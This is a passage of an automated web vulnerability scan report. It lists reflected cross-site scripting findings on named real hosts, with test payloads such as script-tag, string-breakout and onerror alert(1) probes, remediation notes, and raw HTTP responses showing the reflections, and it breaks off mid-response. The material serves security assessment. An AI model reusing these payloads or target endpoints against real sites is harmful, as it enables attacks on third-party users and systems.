This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc14"><script>alert(1)</script>9cdacb9fa3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.105. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/Registration.nsf/ie
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba6e'-alert(1)-'ee41175a30b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.106. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/Registration.nsf/ie
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f957"><script>alert(1)</script>118bad92d24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the OpenIcon request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e8e"><script>alert(1)</script>5dc36f653b2 was submitted in the OpenIcon parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the OpenIcon request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ef64'-alert(1)-'ec333ded5e5 was submitted in the OpenIcon parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d6db"><script>alert(1)</script>9f5a6d4b7fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f27c'%3ba92bf23027c was submitted in the REST URL parameter 1. This input was echoed as 4f27c';a92bf23027c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2852'%3b104f5b44c71 was submitted in the REST URL parameter 3. This input was echoed as d2852';104f5b44c71 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a758"><img%20src%3da%20onerror%3dalert(1)>d2898fe56cb was submitted in the REST URL parameter 3. This input was echoed as 1a758"><img src=a onerror=alert(1)>d2898fe56cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdac'%3b7d4c96bb5a0 was submitted in the REST URL parameter 1. This input was echoed as abdac';7d4c96bb5a0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69cd6"><script>alert(1)</script>060324dbfe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c4"><script>alert(1)</script>3dcf7cba5f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3133'%3bf4524c4b8d8 was submitted in the REST URL parameter 3. This input was echoed as f3133';f4524c4b8d8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77bd5'%3b5c93d414ab4 was submitted in the REST URL parameter 4. This input was echoed as 77bd5';5c93d414ab4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671d3"><script>alert(1)</script>6a55aef7db5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4e35"><script>alert(1)</script>0a608520f46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 827e7'%3b9e2e4f13a56 was submitted in the REST URL parameter 1. This input was echoed as 827e7';9e2e4f13a56 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e996b'%3b52081a5011f was submitted in the REST URL parameter 3. This input was echoed as e996b';52081a5011f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dbad"><script>alert(1)</script>40e20d2ddfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 413d5'%3b0770860f755 was submitted in the REST URL parameter 1. This input was echoed as 413d5';0770860f755 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb203"><script>alert(1)</script>e67e920816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.125. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/web/home.nsf/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7631f"><script>alert(1)</script>1c1d50ccf69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.126. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/web/home.nsf/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb4b1'-alert(1)-'9b480330d0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56417"><script>alert(1)</script>860ececfc88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a676'%3b6fd80229fed was submitted in the REST URL parameter 1. This input was echoed as 2a676';6fd80229fed in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58dc7'%3b6483071eb3a was submitted in the REST URL parameter 3. This input was echoed as 58dc7';6483071eb3a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a234"><script>alert(1)</script>716d9e385a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 378dd'%3b08537c54579 was submitted in the REST URL parameter 4. This input was echoed as 378dd';08537c54579 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3bc"><script>alert(1)</script>500a947cd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.133. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/web/home.nsf/articlesByTitle/Registration%20FAQ
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46048"><script>alert(1)</script>d598d4d4e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.134. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/web/home.nsf/articlesByTitle/Registration%20FAQ
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77b9c'-alert(1)-'67ce31187c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97d0e"%3balert(1)//580d8e3af75 was submitted in the REST URL parameter 1. This input was echoed as 97d0e";alert(1)//580d8e3af75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=fab9bae2efc0dc99e41c60993b9a93ac; path=/; expires=Thu, 06-Oct-2011 20:44:15 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31840 Date: Wed, 05 Oct 2011 20:44:15 GMT X-Varnish: 1169897192 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... e="text/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/97d0e";alert(1)//580d8e3af75/javascript/magnify_pipeline.js"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("ht ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4b8d"%3balert(1)//4f4b1065f78 was submitted in the REST URL parameter 1. This input was echoed as b4b8d";alert(1)//4f4b1065f78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=114da01b737277febeae2f39ceb55562; path=/; expires=Thu, 06-Oct-2011 20:44:15 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31824 Date: Wed, 05 Oct 2011 20:44:15 GMT X-Varnish: 1169897204 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... e="text/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/b4b8d";alert(1)//4f4b1065f78/javascript/magnify_stats.js"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c120"%3balert(1)//e7fea9d0c8f was submitted in the REST URL parameter 1. This input was echoed as 6c120";alert(1)//e7fea9d0c8f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:46 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31850 Date: Wed, 05 Oct 2011 20:45:46 GMT X-Varnish: 1169906903 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... e="text/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/6c120";alert(1)//e7fea9d0c8f/javascript/magnify_twitter_feed.js"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', ( ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0bd6"%3balert(1)//aff4dbd7322 was submitted in the REST URL parameter 1. This input was echoed as f0bd6";alert(1)//aff4dbd7322 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:46 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31755 Date: Wed, 05 Oct 2011 20:44:46 GMT X-Varnish: 1169900415 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... e="text/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/f0bd6";alert(1)//aff4dbd7322/track/dot.gif"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fee4e"><script>alert(1)</script>27d7fd4aae7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:07 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31821 Date: Wed, 05 Oct 2011 20:45:07 GMT X-Varnish: 1169902832 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesfee4e"><script>alert(1)</script>27d7fd4aae7/10gen%0AServer: content.usv.com%0APath: /pagesfee4e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcf97"%3balert(1)//9bd0b370f83 was submitted in the REST URL parameter 1. This input was echoed as dcf97";alert(1)//9bd0b370f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:08 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31718 Date: Wed, 05 Oct 2011 20:45:08 GMT X-Varnish: 1169902914 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pagesdcf97";alert(1)//9bd0b370f83/10gen"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.locatio ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa3a"><script>alert(1)</script>4e97ef34ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:20:06 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31849 Date: Wed, 05 Oct 2011 21:20:06 GMT X-Varnish: 650613692 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesfaa3a"><script>alert(1)</script>4e97ef34ae0/albert-wenger%0AServer: content.usv.com%0APath: /pagesfaa3a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1c91"%3balert(1)//c9804153238 was submitted in the REST URL parameter 1. This input was echoed as d1c91";alert(1)//c9804153238 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:20:07 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31744 Date: Wed, 05 Oct 2011 21:20:07 GMT X-Varnish: 650613762 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pagesd1c91";alert(1)//c9804153238/albert-wenger"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 474ba"%3balert(1)//af9d30a255 was submitted in the REST URL parameter 1. This input was echoed as 474ba";alert(1)//af9d30a255 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:16:42 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31734 Date: Wed, 05 Oct 2011 21:16:42 GMT X-Varnish: 650595333 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pages474ba";alert(1)//af9d30a255/brad-burnham"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document. ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c834"><script>alert(1)</script>021193172a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:16:41 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31844 Date: Wed, 05 Oct 2011 21:16:42 GMT X-Varnish: 650595245 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages8c834"><script>alert(1)</script>021193172a9/brad-burnham%0AServer: content.usv.com%0APath: /pages8c834"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6003a"%3balert(1)//90e08d69bc0 was submitted in the REST URL parameter 1. This input was echoed as 6003a";alert(1)//90e08d69bc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:59 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31733 Date: Wed, 05 Oct 2011 20:44:59 GMT X-Varnish: 1169902003 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
